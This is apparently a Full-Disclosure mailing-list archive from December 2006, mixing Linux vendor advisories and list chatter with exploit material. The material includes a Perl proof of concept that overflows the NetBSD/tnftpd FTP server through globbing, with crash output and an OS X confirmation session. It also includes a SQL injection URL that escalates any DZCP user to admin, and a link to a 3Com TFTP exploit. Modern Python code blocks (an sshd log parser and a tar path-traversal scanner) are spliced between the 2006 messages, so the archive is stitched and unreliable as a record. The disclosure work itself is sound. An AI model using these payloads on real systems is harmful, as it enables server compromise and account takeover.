From jammer128 at gmail.com Fri Dec 1 00:19:23 2006
From: jammer128 at gmail.com (Jason Miller)
Date: Thu, 30 Nov 2006 18:19:23 -0600
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <456BF10D.9080400@matousec.com>
References: <456BF10D.9080400@matousec.com>
Message-ID: <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com>

I'm detecting legal actions already.

On 11/28/06, David Matousek wrote:
>
> Hello,
>
> For all Nmap fans, our group has implemented Nmap Online service.
> Its address is http://nmap-online.com/. The interface allows you to
> perform custom Nmap scans from our server with only a few limitations
> in the syntax. The service is free and can be used immediately, no
> registration is required.
>
> Please direct your questions and suggestions to our emails.
>
> Regards,
>
> --
> David Matousek
>
> Founder and Chief Representative of Matousec - Transparent security
> http://www.matousec.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From zdi-disclosures at 3com.com Fri Dec 1 00:27:41 2006
From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com)
Date: Thu, 30 Nov 2006 16:27:41 -0800
Subject: [Full-disclosure] ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow Vulnerability
In-Reply-To:
Message-ID:

Thanks for pointing this out JP, it does in fact look confusing. We determined during the Digital Vaccine filter creation process that a previously released filter was robust enough to block the attack without further modification and the vendor was immediately notified.
ZDI Team

"Dude VanWinkle" 11/30/2006 05:02 AM
To: zdi-disclosures/F/US/3Com at 3Com
cc: full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com
Subject: Re: [Full-disclosure] ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow Vulnerability

On 11/29/06, zdi-disclosures at 3com.com wrote:
> ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow
> Vulnerability
> http://www.zerodayinitiative.com/advisories/ZDI-06-043.html
> November 29, 2006
> -- Disclosure Timeline:
> 2005.07.07 - Digital Vaccine released to TippingPoint customers
> 2006.10.02 - Vulnerability reported to vendor
> 2006.11.29 - Coordinated public release of advisory

You waited over a year to report it to the vendor? Sounds like analyzing your digital vaccine rules might yield a slew of reproducible 0 days that vendors are unaware of.....

-JP

From kingcope at gmx.net Fri Dec 1 00:25:14 2006
From: kingcope at gmx.net (kcope)
Date: Fri, 01 Dec 2006 01:25:14 +0100
Subject: [Full-disclosure] NetBSD FTPD and ports ***REMOTE ROOOOOT HOLE***
Message-ID: <20061201002514.196150@gmx.net>

LAMERZ!!!!!
KEEP ON HACKING!!! KEEP THAT *FUCK*ING PRIVATE!!!

Greetings to the elite guys, thank you for your time.

signed,
***eliteboy***

$$$ NetBSD ftpd and ports *Remote ROOOOOT $HOLE$* $$$

About

tnftpd is a port of the NetBSD FTP server to other systems.
It offers many enhancements over the traditional BSD ftpd,
including per-class configuration directives via ftpd.conf(5),
RFC 2389 and draft-ietf-ftpext-mlst-11 support, IPv6,
transfer rate throttling, and more.
tnftpd was formerly known as lukemftpd,
and earlier versions are present in Mac OS X 10.2 (as ftpd)
and FreeBSD 5.0 (as lukemftpd).

Description

The NetBSD ftpd and the tnftpd port suffer from a remote stack overrun,
which can lead to a root compromise.

The bug is in the glob.c file. The globbing mechanism is flawed, as it was back in 2001.
To trigger the overflow you can create a folder and use the globbing special characters (like STARS) to overflow an internal stack-based buffer.

Example PoC:
---snip---
use IO::Socket;

$sock = IO::Socket::INET->new(PeerAddr => '192.168.2.10',
                              PeerPort => '21',
                              Proto    => 'tcp');
$c = "C";
$a = "C" x 255;
$d = "A" x 450;

print $sock "USER kcope\r\n";
print $sock "PASS remoteroot\r\n";
$x = <$sock>;
print $sock "MKD $a\r\n";
print $sock "NLST C*/../C*/../C*/../$d\r\n";
print $sock "QUIT\r\n";

while (<$sock>) {
    print;
}
---snip---

gdb output tested on NetBSD 3.0 i386 NetBSD-ftpd 20050303 :

(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x00410041 in ?? ()
(gdb)

tnftpd-20040810 behaves similarly.
FreeBSD (lukemftpd) and MacOSX (ftpd) were not tested,
however they could have the same bug, because of the same
codebase.

The problem when exploiting this kind of bug is
that we can only control 0x00410041, not the whole
32 bits. However it looks feasible to find a way
to do a whole EIP redirection and/or exploit
the bug the "unicode" way, which could be especially
hard on BSD systems.

--
GMX SmartSurfer helps you save up to 70% of your online costs!
Ideal for modem and ISDN: http://www.gmx.net/de/go/smartsurfer

From kf_lists at digitalmunition.com Fri Dec 1 01:17:23 2006
From: kf_lists at digitalmunition.com (K F (lists))
Date: Thu, 30 Nov 2006 20:17:23 -0500
Subject: [Full-disclosure] NetBSD FTPD and ports ***REMOTE ROOOOOT HOLE***
In-Reply-To: <20061201002514.196150@gmx.net>
References: <20061201002514.196150@gmx.net>
Message-ID: <456F82A3.40001@digitalmunition.com>

I can confirm that this bug is present on OSX 10.3.9 at the very least. lukemftpd-20040810 is the version this was tested against.
I am fairly sure that this issue was patched recently in:

Security Update 2006-003

* FTPServer
CVE-ID: CVE-2006-1445
Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.6, Mac OS X Server v10.4.6
Impact: FTP operations by authenticated FTP users may lead to arbitrary code execution
Description: Multiple issues in FTP server path name handling could result in a buffer overflow. A malicious authenticated user may be able to trigger this overflow which may lead to arbitrary code execution with the privileges of the FTP server. This update addresses the issue by properly handling the boundary conditions.

ftp> o localhost
Trying ::1...
Connected to localhost.
220 localhost FTP server (tnftpd 20040810) ready.
Name (localhost:kevinf):
331 Password required for kevinf.
Password:
230- Welcome to Darwin!
230 User kevinf logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mkdir CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
550 CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC: File exists.
ftp> ls C*/../C*/../C*/../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
229 Entering Extended Passive Mode (|||49225|)
421 Service not available, remote server timed out.
Connection closed
ftp>

kevin-fs-Computer:/cores kevinf$ sudo gdb -q /usr/libexec/ftpd 425
Password:
Reading symbols for shared libraries ... done
/cores/425: No such file or directory.
Attaching to program: `/usr/libexec/ftpd', process 425.
Reading symbols for shared libraries ........... done
0x9000ed44 in read ()
(gdb) c
Continuing.

Program received signal EXC_BAD_ACCESS, Could not access memory.
0x00410040 in ?? ()
(gdb) bt
#0  0x00410040 in ?? ()
Cannot access memory at address 0x410040
Cannot access memory at address 0x410041
#1  0x00000000 in ?? ()
(gdb)

kevin-fs-Computer:/Volumes/HARD DISK kevinf$ ps -aux -ocommand,svuid,svgid,ruid,rgid,uid,gid | grep ftpd
kevinf 425 0.0 0.3 28072 820 ?? SXs 8:02PM 0:00.05 0 0 0 0 501 501 ftpd -l

This could be fun on x86 machines.... good luck on powerpc however.

Thanks for the excuse to finish my OSX Unicode research!

-KF

kcope wrote:
> LAMERZ!!!!!
> KEEP ON HACKING!!! KEEP THAT *FUCK*ING PRIVATE!!!
>
> Greetings to the elite guys, thank you for your time.
>
> signed,
> ***eliteboy***
>
> $$$ NetBSD ftpd and ports *Remote ROOOOOT $HOLE$* $$$
>
> About
>
> tnftpd is a port of the NetBSD FTP server to other systems.
> It offers many enhancements over the traditional BSD ftpd,
> including per-class configuration directives via ftpd.conf(5),
> RFC 2389 and draft-ietf-ftpext-mlst-11 support, IPv6,
> transfer rate throttling, and more.
> tnftpd was formerly known as lukemftpd,
> and earlier versions are present in Mac OS X 10.2 (as ftpd)
> and FreeBSD 5.0 (as lukemftpd).
>
> Description
>
> The NetBSD ftpd and the tnftpd port suffer from a remote stack overrun,
> which can lead to a root compromise.
>
> The bug is in the glob.c file. The globbing mechanism is flawed, as it was back in
> 2001.
>
> To trigger the overflow you can create a folder and use the globbing
> special characters (like STARS) to overflow an internal stack-based buffer.
> Example PoC:
> ---snip---
> use IO::Socket;
>
> $sock = IO::Socket::INET->new(PeerAddr => '192.168.2.10',
>                               PeerPort => '21',
>                               Proto    => 'tcp');
> $c = "C";
> $a = "C" x 255;
> $d = "A" x 450;
>
> print $sock "USER kcope\r\n";
> print $sock "PASS remoteroot\r\n";
> $x = <$sock>;
> print $sock "MKD $a\r\n";
> print $sock "NLST C*/../C*/../C*/../$d\r\n";
> print $sock "QUIT\r\n";
>
> while (<$sock>) {
>     print;
> }
> ---snip---
>
> gdb output tested on NetBSD 3.0 i386 NetBSD-ftpd 20050303 :
> (gdb) c
> Continuing.
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x00410041 in ?? ()
> (gdb)
>
> tnftpd-20040810 behaves similarly.
> FreeBSD (lukemftpd) and MacOSX (ftpd) were not tested,
> however they could have the same bug, because of the same
> codebase.
>
> The problem when exploiting this kind of bug is
> that we can only control 0x00410041, not the whole
> 32 bits. However it looks feasible to find a way
> to do a whole EIP redirection and/or exploit
> the bug the "unicode" way, which could be especially
> hard on BSD systems.
>

From dudevanwinkle at gmail.com Fri Dec 1 01:52:25 2006
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Thu, 30 Nov 2006 20:52:25 -0500
Subject: [Full-disclosure] ZDI-06-043: Novell Netware Client Print Provider Buffer Overflow Vulnerability
In-Reply-To:
References:
Message-ID:

On 11/30/06, zdi-disclosures at 3com.com wrote:
> Thanks for pointing this out JP, it does in fact look confusing. We
> determined during the Digital Vaccine filter creation process that a
> previously released filter was robust enough to block the attack without
> further modification and the vendor was immediately notified.

NP, I would clarify that in future notifications. i.e.: "tippingpoint customers have been protected from attacks of this kind since xyz date by GenericFilterX". Then you could list the time lines for discovered/acquired, vendor notification, patch released from vendor, and finally; public disclosure.
-JP

From security at mandriva.com Fri Dec 1 02:18:01 2006
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 30 Nov 2006 19:18:01 -0700
Subject: [Full-disclosure] [ MDKSA-2006:220 ] - Updated libgsf packages fix heap buffer overflow vulnerability
Message-ID:

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2006:220
http://www.mandriva.com/security/
_______________________________________________________________________

Package : libgsf
Date    : November 30, 2006
Affected: 2007.0, Corporate 3.0
_______________________________________________________________________

Problem Description:

"infamous41md" discovered a heap buffer overflow vulnerability in libgsf, a GNOME library for reading and writing structured file formats, which could lead to the execution of arbitrary code.

The updated packages have been patched to correct this problem.
_______________________________________________________________________

References:

http://www.debian.org/security/2006/dsa-1221
_______________________________________________________________________

Updated Packages:

_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team

From security at mandriva.com Fri Dec 1 03:29:01 2006
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 30 Nov 2006 20:29:01 -0700
Subject: [Full-disclosure] [ MDKSA-2006:221 ] - Updated gnupg packages fix vulnerability
Message-ID:

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDKSA-2006:221
http://www.mandriva.com/security/
_______________________________________________________________________

Package : gnupg
Date    : November 30, 2006
Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

Buffer overflow in the ask_outfile_name function in openfile.c for GnuPG (gpg) 1.4 and 2.0, when running interactively, might allow attackers to execute arbitrary code via messages that cause the make_printable_string function to return a longer string than expected while constructing a prompt.

Updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6169
_______________________________________________________________________

Updated Packages:

_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team

From tonnerre.lombard at sygroup.ch Fri Dec 1 07:47:13 2006
From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard)
Date: Fri, 01 Dec 2006 08:47:13 +0100
Subject: [Full-disclosure] SSH brute force blocking tool
In-Reply-To: <456C6AFF.3060004@infiltrated.net>
References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net>
Message-ID: <1164959233.39297.35.camel@aspirateur.sygroup-int.ch>

Hi,

On Tue, 2006-11-28 at 11:59 -0500, J. Oquendo wrote:
> Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227
> awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}'

What if I set my user name to "bikermice from mars"? Are you going to blacklist mars then?

Tonnerre

--
SyGroup GmbH
Tonnerre Lombard

Solutions Systematiques
Tel:+41 61 333 80 33
Roeschenzerstrasse 9
Fax:+41 61 383 14 67
4153 Reinach BL
Web:www.sygroup.ch
tonnerre.lombard at sygroup.ch
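Tonnerre's objection is that the posted awk one-liner picks the address by whitespace field position, so a client-supplied user name containing the word "from" shifts the fields and whatever follows it gets blacklisted. The following is an added example, not code from the thread: it re-implements the field-position extraction beside a parser anchored on the end of the line (sshd appends the real " from <addr>" after the user name it received) and validates the address before it can become a blacklist entry. All log lines are constructed samples.

```python
import ipaddress
import re

# Constructed sample sshd lines (not from the original thread). Lines 2 and 3
# carry attacker-chosen user names that embed the word "from".
SAMPLE_LOG = [
    "Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227",
    "Nov 27 16:31:25 local sshd[67011]: Illegal user bikermice from mars from 213.134.128.227",
    "Nov 27 16:31:30 local sshd[67012]: Illegal user admin from 10.0.0.1 from 198.51.100.7",
    "Nov 27 16:32:02 local sshd[67013]: Accepted publickey for alice from 192.0.2.9 port 2222 ssh2",
]


def awk_style_extract(line):
    """Re-implements the posted one-liner by whitespace field position:
        awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}'
    awk numbers fields from 1, so $N is f[N-1] here."""
    f = line.split()
    if len(f) >= 10 and (f[4] == "Illegal" or f[5] == "Illegal") and f[8] == "from":
        return f[9]
    return None


# Anchor on the END of the message. The user name is the only client-controlled
# part; the greedy (?P<user>.*) absorbs any "from" inside it, and the last
# " from <addr>" is the one sshd itself appended. Newer OpenSSH logs
# "Invalid user ... port N", which the optional suffix accepts too.
ILLEGAL_USER = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: "
    r"(?:Illegal|Invalid) user (?P<user>.*) from (?P<addr>\S+)(?: port \d+)?$"
)


def parse_illegal_user(line):
    """Return {'user', 'addr'} for an illegal-user line, or None.
    The address must parse as IPv4/IPv6; otherwise the line is ignored
    rather than turned into a bogus blacklist entry."""
    m = ILLEGAL_USER.match(line)
    if not m:
        return None
    try:
        addr = ipaddress.ip_address(m.group("addr"))
    except ValueError:
        return None
    return {"user": m.group("user"), "addr": str(addr)}


def blacklist_candidates(lines, threshold=1):
    """Count illegal-user attempts per source address and return the
    addresses that reached `threshold`, in order of first appearance."""
    counts = {}
    for line in lines:
        rec = parse_illegal_user(line)
        if rec is None:
            continue
        counts[rec["addr"]] = counts.get(rec["addr"], 0) + 1
    return [addr for addr, n in counts.items() if n >= threshold]


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print("field-based:", awk_style_extract(line), "| anchored:", parse_illegal_user(line))
    print("blacklist (>= 2 attempts):", blacklist_candidates(SAMPLE_LOG, threshold=2))
```

On the second sample the field-based extraction yields "mars" and on the third an address the attacker chose, while the anchored parser returns the connecting host in both cases.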
From dante at alighieri.org Fri Dec 1 08:47:00 2006
From: dante at alighieri.org (Davide Del Vecchio)
Date: Fri, 01 Dec 2006 09:47:00 +0100
Subject: [Full-disclosure] 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit
Message-ID: <20061201084700.1146.qmail@webmaild.fe1.aruba.it>

Hello list,

this is a poc exploit for 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit written by Cthulhu

http://www.crazybinary.org/exploits/3comftp_xpsp2.rb

Enjoy it,

Davide Del Vecchio & Michele Tumolo (Cthulhu).

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Davide Del Vecchio "Dante Alighieri"
dante at alighieri.org
http://www.alighieri.org
http://legaest.blogspot.com
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

From michael.huber at gmail.com Fri Dec 1 08:13:38 2006
From: michael.huber at gmail.com (Mike Huber)
Date: Fri, 1 Dec 2006 03:13:38 -0500
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com>
References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com>
Message-ID:

First of all, IANAL, but the TOS seem to cover the basics... However, I am unsure whether they would hold up under strict legal scrutiny. As far as I can tell, they may hold up under US criminal law, but not under civil law, as tort law has its own wonderful little eccentricities. The best safeguard they seem to have is that they must log the source IP of all scan requests...
As far as I know, anyone who takes the time to read the nmap man page should be able to craft a scan which won't be detected by the scanned host (can someone be a definitive source on this point?), and anyone taking malicious action ought to be taking sufficient precautions to avoid detection anyway.

Nonetheless, my 8-ball sees litigation in their future.

On 11/30/06, Jason Miller wrote:
>
> I'm detecting legal actions already.
>
> On 11/28/06, David Matousek wrote:
> >
> > Hello,
> >
> > For all Nmap fans, our group has implemented Nmap Online service.
> > Its address is http://nmap-online.com/. The interface allows you to
> > perform custom Nmap scans from our server with only a few limitations
> > in the syntax. The service is free and can be used immediately, no
> > registration is required.
> >
> > Please direct your questions and suggestions to our emails.
> >
> > Regards,
> >
> > --
> > David Matousek
> >
> > Founder and Chief Representative of Matousec - Transparent security
> > http://www.matousec.com/
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
From announce-noreply at rpath.com Fri Dec 1 03:40:00 2006
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Thu, 30 Nov 2006 22:40:00 -0500
Subject: [Full-disclosure] rPSA-2006-0220-1 dovecot
Message-ID: <456fa410.x1FK2H34l0MlWBaT%announce-noreply@rpath.com>

rPath Security Advisory: 2006-0220-1
Published: 2006-11-30
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
    Local Deterministic Denial of Service
Updated Versions:
    dovecot=/conary.rpath.com at rpl:devel//1/1.0.beta8-4.2-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5973
    https://issues.rpath.com/browse/RPL-802

Description:
    Previous versions of the dovecot package are vulnerable to a denial of service attack only in a non-default configuration, and only by authenticated users in that configuration.

From announce-noreply at rpath.com Fri Dec 1 03:43:57 2006
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Thu, 30 Nov 2006 22:43:57 -0500
Subject: [Full-disclosure] rPSA-2006-0221-1 openldap openldap-clients openldap-servers
Message-ID: <456fa4fd.mjZLbPK7jnGjCHNF%announce-noreply@rpath.com>

rPath Security Advisory: 2006-0221-1
Published: 2006-11-30
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
    Remote Deterministic Denial of Service
Updated Versions:
    openldap=/conary.rpath.com at rpl:devel//1/2.2.26-8.5-1
    openldap-clients=/conary.rpath.com at rpl:devel//1/2.2.26-8.5-1
    openldap-servers=/conary.rpath.com at rpl:devel//1/2.2.26-8.5-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5779
    https://issues.rpath.com/browse/RPL-820

Description:
    Previous versions of the openldap package are vulnerable to a remote denial of service attack that causes the openldap daemon to crash. This vulnerability is understood not to enable any form of remote execution.
From announce-noreply at rpath.com Fri Dec 1 03:46:14 2006
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Thu, 30 Nov 2006 22:46:14 -0500
Subject: [Full-disclosure] rPSA-2006-0222-1 tar
Message-ID: <456fa586.6BVDPdoZiyllr7wx%announce-noreply@rpath.com>

rPath Security Advisory: 2006-0222-1
Published: 2006-11-30
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
    Indirect User Deterministic Vulnerability
Updated Versions:
    tar=/conary.rpath.com at rpl:devel//1/1.15.1-7.1-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6097
    https://issues.rpath.com/browse/RPL-821

Description:
    Previous versions of the tar package are vulnerable to an attack in which unpacking an intentionally-malformed tar archive can overwrite arbitrary files to which the user running tar has write access. If the attacking user knows the name of a vulnerable binary file and overwrites it, this allows the attacker to place arbitrary code on the system which is likely to be run. If root is running tar, this includes any file on the system, which would elevate this to an indirect non-deterministic remote root unauthorized access vulnerability.
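The tar advisory above describes archives whose extraction writes outside the chosen directory. As an added example (not rPath's or GNU tar's code, and not a detector for the specific GNU tar defect behind CVE-2006-6097), here is a pre-extraction check in Python that walks an archive's member list and flags the ways an entry can land outside the destination: parent traversal, absolute names, links pointing outside, and files written through an earlier symlink. The archive and the destination path `/srv/extract` are constructed for the example.

```python
import io
import posixpath
import tarfile


def _inside(dest, path):
    """True if the normalised absolute `path` is `dest` itself or below it."""
    return path == dest or path.startswith(dest + "/")


def unsafe_members(tar, dest):
    """Return [(member_name, reason)] for every member whose extraction under
    `dest` would touch a path outside it, directly or through a link.
    Members are examined in archive order, so a symlink is known before any
    later member that would be written through it. (Recent Python releases
    ship tarfile.data_filter, which applies similar checks at extraction.)"""
    dest = posixpath.normpath(dest)
    findings = []
    symlinks = set()            # normalised names of symlinks seen so far
    for m in tar.getmembers():
        name = posixpath.normpath(m.name)
        target = posixpath.normpath(posixpath.join(dest, name))
        # posixpath.join discards `dest` when `name` is absolute, so both
        # "../x" and "/etc/x" end up outside and are caught here.
        if posixpath.isabs(m.name) or not _inside(dest, target):
            findings.append((m.name, "path escapes destination"))
        # Any directory component that is an earlier symlink means the
        # write follows that link, wherever it points.
        parts = name.split("/")
        if any("/".join(parts[:i]) in symlinks for i in range(1, len(parts))):
            findings.append((m.name, "extracts through an earlier symlink"))
        if m.issym():
            # Symlink targets resolve relative to the link's own directory.
            link = posixpath.normpath(
                posixpath.join(dest, posixpath.dirname(name), m.linkname))
            if posixpath.isabs(m.linkname) or not _inside(dest, link):
                findings.append((m.name, "symlink target escapes destination"))
            symlinks.add(name)
        elif m.islnk():
            # Hard link targets are archive-relative.
            link = posixpath.normpath(posixpath.join(dest, m.linkname))
            if not _inside(dest, link):
                findings.append((m.name, "hardlink target escapes destination"))
        elif m.isdev():
            findings.append((m.name, "device node"))
    return findings


def build_sample_archive():
    """Constructed in-memory archive (not from the advisory) mixing benign
    members with traversal, absolute-path and symlink entries."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add_file(name, data=b"x\n"):
            ti = tarfile.TarInfo(name)
            ti.size = len(data)
            tar.addfile(ti, io.BytesIO(data))

        def add_symlink(name, linkname):
            ti = tarfile.TarInfo(name)
            ti.type = tarfile.SYMTYPE
            ti.linkname = linkname
            tar.addfile(ti)

        add_file("pkg/README")                  # benign
        add_symlink("pkg/alias", "README")      # benign, stays inside pkg/
        add_file("../../home/user/.bashrc")     # parent traversal
        add_file("/etc/ld.so.preload")          # absolute path
        add_symlink("pkg/link", "../../etc")    # points outside dest
        add_file("pkg/link/passwd")             # written through that link
    buf.seek(0)
    return buf


def scan_archive(fileobj, dest="/srv/extract"):
    """Open an archive from a file object and list its unsafe members."""
    with tarfile.open(fileobj=fileobj, mode="r:") as tar:
        return unsafe_members(tar, dest)


if __name__ == "__main__":
    for name, reason in scan_archive(build_sample_archive()):
        print(f"{reason}: {name}")
```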
From announce-noreply at rpath.com Fri Dec 1 03:48:29 2006
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Thu, 30 Nov 2006 22:48:29 -0500
Subject: [Full-disclosure] rPSA-2006-0224-1 gnupg
Message-ID: <456fa60d.GYk4A3QvAzgXP9D7%announce-noreply@rpath.com>

rPath Security Advisory: 2006-0224-1
Published: 2006-11-30
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification:
    Indirect Non-deterministic Unauthorized Access
Updated Versions:
    gnupg=/conary.rpath.com at rpl:devel//1/1.4.5-1.1-1

References:
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6169
    https://issues.rpath.com/browse/RPL-826

Description:
    Previous versions of the gnupg package contain a weakness that may enable an attacker to create a malformed message that causes gnupg to crash or execute arbitrary code provided by the attacker. This weakness exists only in interactive mode; other applications which call gpg in batch mode are not susceptible.

From scy-adv at scytale.de Fri Dec 1 09:00:32 2006
From: scy-adv at scytale.de (Tim Weber)
Date: Fri, 1 Dec 2006 10:00:32 +0100
Subject: [Full-disclosure] deV!L`z Clanportal - SQL Injection [061124a]
Message-ID: <200612011000.33083.scy-adv@scytale.de>

/ -[061124a]- \
| deV!L`z Clanportal - SQL Injection |
\ /

S Y N O P S I S /
================='

-( access: remote   severity: high )-

An SQL injection has been found in deV!L`z Clanportal, which allows any logged in user to grant herself admin privileges in the system.

B A C K G R O U N D /
====================='

deV!L`z Clanportal (short "DZCP") is a suite of PHP scripts that allow anybody to create a feature-rich website for her online gaming clan.

A F F E C T E D  V E R S I O N S /
==================================='

verified on:         1.3.6
possibly vulnerable: <= 1.3.6
fixed in:            1.3.6.1

I M P A C T /
============='

The attacker gains admin privileges in DZCP and is thus able to create and download a MySQL dump, upload files, post news, delete users etc.
P R E R E Q U I S I T I E S /
============================='

o the attacker needs to have a user account in the suite and be logged in
o php.ini directive "magic_quotes_gpc" has to be disabled

D E S C R I P T I O N /
======================='

sites/index.php is not escaping the $_GET['show'] parameter, leading to an SQL injection. This can be used to pass any string to the $where parameter in DZCP's page() function. page(), in turn, is not checking that parameter, allowing a second SQL injection in an UPDATE statement on the "users" table to change arbitrary attributes in the calling user's tuple, including the "level" attribute, which, set to 4, grants the user administrator privileges.

W O R K A R O U N D /
====================='

Some possibilities:

o Add a mysql_real_escape_string() around the $_GET parameter in the SQL query in sites/index.php.
o Remove sites/index.php or make it inaccessible.
o Quit using DZCP. I mean it! There are tons of other vulnerabilities just waiting to be exploited; some of them more severe than this one. IMHO, DZCP is just a chaotic bunch of vulnerabilities that, by some coincidence, happen to look like a clan portal.

P R O O F  O F  C O N C E P T /
==============================='

Check if magic_quotes_gpc is enabled:

http:///sites/index.php?show='

If a MySQL error appears or the script dies, it is disabled.
Then:

http:///sites/index.php?show=-1'+%55NION+%53ELECT+1,+'Admin+Panel\',+level%3d4,+waffe%3d\'SQL+Injection',+2,+3,+'

T I M E L I N E  (CET) /
========================'

2006-11-23 23:05  started searching
        24  0:35  exploited
           14:20  advisory finished
           17:31  informed vendor that any user can get admin privileges
        25 23:00  full disclosure to vendor
        27 14:36  hotfix available on vendor website
     12-01 10:00  full disclosure to the general public

A B O U T  T H E  A U T H O R /
==============================='

Tim Weber, computer science student at the University of Mannheim, Germany, currently looking for an internship at some IT security or pentesting company, can be reached via e-mail: scy-adv-061124a at the host scytale.de.

T H A N K S /
============='

o Kallista
